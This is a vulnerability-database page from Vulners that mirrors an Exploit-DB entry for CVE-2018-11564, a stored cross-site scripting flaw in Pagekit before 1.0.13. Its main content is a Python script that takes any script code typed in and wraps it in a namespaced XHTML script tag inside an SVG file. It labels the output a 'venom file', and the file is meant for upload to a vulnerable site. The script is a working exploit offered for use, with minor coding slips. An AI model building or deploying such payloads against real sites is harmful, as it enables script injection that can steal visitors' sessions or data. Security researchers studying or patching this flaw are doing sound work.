Lucene search
+L

Pagekit < 1.0.13 - Cross-Site Scripting Code Generator

🗓️ 05 Jun 2018 00:00:00Reported by DEEPIN2Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 27 Views

Pagekit < 1.0.13 - Cross-Site Scripting Code Generator by DEEPIN

Related
Code
ReporterTitlePublishedViews
Family
zdt
zdt
Pagekit < 1.0.13 - Cross-Site Scripting Code Generator Exploit
6 Jun 201800:00
zdt
circl
Circl
CVE-2018-11564
14 May 202203:14
circl
cve
CVE
CVE-2018-11564
1 Jun 201821:00
cve
cvelist
Cvelist
CVE-2018-11564
1 Jun 201821:00
cvelist
euvd
EUVD
EUVD-2022-2239
3 Oct 202520:07
euvd
github
Github Security Blog
Pagekit Stored Cross-site Scripting
14 May 202203:14
github
nvd
NVD
CVE-2018-11564
2 Jun 201801:29
nvd
osv
OSV
GHSA-3RWJ-V7JP-W542 Pagekit Stored Cross-site Scripting
14 May 202203:14
osv
packetstorm
Packet Storm
PageKit CMS 1.0.13 Cross Site Scripting
31 May 201800:00
packetstorm
packetstorm
Packet Storm
Pagekit Cross Site Scripting Code Generator
5 Jun 201800:00
packetstorm
Rows per page
# Title: Pagekit < 1.0.13 - Cross-Site Scripting Code Generator
# Author : DEEPIN2
# Date: 2018-06-05
# Vendor: Pagekit
# Sotware: https://pagekit.com/
# Version: < 1.0.13
# CVE: 2018-11564
# python3 required

def makesvg(name, code):
	code = '<exploit:script xmlns:exploit="http://www.w3.org/1999/xhtml">' + code + '</exploit:script>'
	f = open(name, 'w+')
	f.write(code)
	f.close


if __name__ == '__main__':
	print('''
  ______     _______     ____   ___  _  ___        _ _ ____   __   _  _
 / ___\ \   / / ____|   |___ \ / _ \/ |( _ )      / / | ___| / /_ | || |
| |    \ \ / /|  _| _____ __) | | | | |/ _ \ _____| | |___ \| '_ \| || |_
| |___  \ V / | |__|_____/ __/| |_| | | (_) |_____| | |___) | (_) |__   _|
 \____|  \_/  |_____|   |_____|\___/|_|\___/      |_|_|____/ \___/   |_|
	[*] Author : DEEPIN2(Junseo Lee)''')
	print('[*] enter name without extension, ex) test.svg -> test')
	filename = input('Filename : ') + '.svg'
	print('[*] If you want to use alert(), type "alert("bla..bla..")"')
	scriptcode = input('Script code : ')
	try:
		makesvg(filename, scriptcode)
		print('[+] Successfully make venom file "%s"' %filename)
	except Error as e:
		print(e)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Jun 2018 00:00Current
5.1Medium risk
Vulners AI Score5.1
CVSS 23.5
CVSS 34.8
EPSS0.03169
27